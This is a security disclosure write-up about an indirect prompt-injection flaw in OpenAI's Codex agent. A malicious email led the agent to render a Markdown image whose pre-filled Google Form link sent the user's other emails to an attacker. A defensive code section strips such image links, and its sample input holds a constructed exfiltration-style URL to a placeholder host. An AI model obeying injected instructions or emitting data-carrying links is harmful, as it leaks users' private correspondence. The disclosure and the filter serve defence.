Codex for Everything Exfiltrates Connected Data

Codex for Everything was susceptible to data exfiltration via indirect prompt injection, exposing sensitive data from connected apps with no human-in-the-loop steps required.

Overview

‘Codex for Everything’ is an update to Codex that enables its use beyond coding, for day-to-day tasks. It includes over 90 new plugins and features, such as ‘browser use’ and ‘computer use’, that make Codex an all-purpose agent in a bid to compete with Anthropic’s Claude Cowork and Microsoft’s Copilot Cowork. 

In this article, we demonstrate that a malicious email could manipulate Codex for Everything to exfiltrate the complete contents of other emails Codex was reviewing. Exfiltration occurred via outputting a malicious image, which triggered an automatic submission to an attacker-controlled Google form.

We demonstrate the vulnerability via an indirect prompt injection in an untrusted email, but an injection in any untrusted data source could exploit the vulnerability across Codex use cases.

This vulnerability was responsibly disclosed on April 21, 2026, and has been remediated by OpenAI. More details on the responsible disclosure are at the end of the article.

The Attack Chain

  1. A user asks Codex for help reviewing emails

    User asks Codex for Everything to triage their emails

    OpenAI's Email plugin comes with a Skill for triaging emails, and reviewing emails is part of a demonstrated use case in the Codex for Everything release.


  2. A prompt injection is hidden in one of the emails Codex finds

    The user’s inbox contains an email from an external party that includes a prompt injection. 

    The user receives an email containing a prompt injection.

    Email content is not displayed to the user during Codex’s review process.


  3. Codex is manipulated to output an insecure image, triggering data exfiltration

    Codex is manipulated to generate and output Markdown image syntax that contains a pre-filled Google Form submission link, populated with the victim's email data. This automatically submits the victim's emails to an attacker-controlled Google Form.

    No user interaction is required beyond submission of the initial email triage query.

    Codex outputs a malicious image that exfiltrates data.


  4. The attacker can view the victim’s emails in their Google Form submissions

    This attack exfiltrated sensitive emails, including legal correspondence, organizational financial planning, and security-related notifications.

    Data exfiltrated from Codex is in the attacker's Google Form responses
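
A defensive counterpart to step 3, as an added example that is not PromptArmor's or OpenAI's code and does not describe OpenAI's remediation: an output filter that strips image syntax from a model response unless the URL is https on an allowlisted host. The allowlisted host, the placeholder collector host in the sample, and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts the chat client may fetch images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# ![alt](url "title"); alt is matched lazily so nested brackets cannot hide an image.
INLINE_IMG = re.compile(r'!\[(.*?)\]\(\s*<?([^)\s>]*)>?[^)]*\)', re.DOTALL)
# [label]: url, the target of reference-style images such as ![alt][label].
REF_DEF = re.compile(
    r'^[ \t]{0,3}\[[^\]\n]+\]:\s*<?(\S+?)>?(?:[ \t].*)?$', re.MULTILINE)
# Raw HTML <img> tags, which many Markdown renderers pass through.
HTML_IMG = re.compile(r'<img\b[^>]*>', re.IGNORECASE)
PLACEHOLDER = "(image removed)"


def is_allowed(url):
    """Default deny: only https URLs on an allowlisted host pass."""
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    return parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS


def sanitize(text):
    """Return (safe_text, blocked) for one model response before rendering."""
    blocked = []
    def check(url, original, replacement):
        if is_allowed(url):
            return original
        blocked.append(url)
        return replacement

    def drop_tag(match):
        blocked.append(match.group(0))
        return PLACEHOLDER

    text = INLINE_IMG.sub(lambda m: check(m.group(2), m.group(0), PLACEHOLDER), text)
    # Fails closed: this also drops reference-style links to other hosts.
    text = REF_DEF.sub(lambda m: check(m.group(1), m.group(0), ""), text)
    # Raw <img> tags are removed unconditionally (covers src, srcset, data-*).
    return HTML_IMG.sub(drop_tag, text), blocked


if __name__ == "__main__":  # constructed sample; the host is a placeholder
    sample = "Triage done.\n![s](https://collector.example.net/r?d=CONSTRUCTED)\n"
    print(sanitize(sample))
```

Run it on every model response before the client renders Markdown, and log the `blocked` list as a prompt-injection signal. A filter on text is a backstop, so the renderer should also refuse image fetches to hosts outside the allowlist.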


Responsible Disclosure

This vulnerability was responsibly disclosed on Apr 21, 2026, and has been remediated by OpenAI.

Timeline

Apr 21, 2026 PromptArmor discloses to OpenAI via HackerOne
May  6, 2026 HackerOne requests additional details
May  6, 2026 PromptArmor follows up
May 14, 2026 HackerOne validates and triages the vulnerability
May 21, 2026 Public disclosure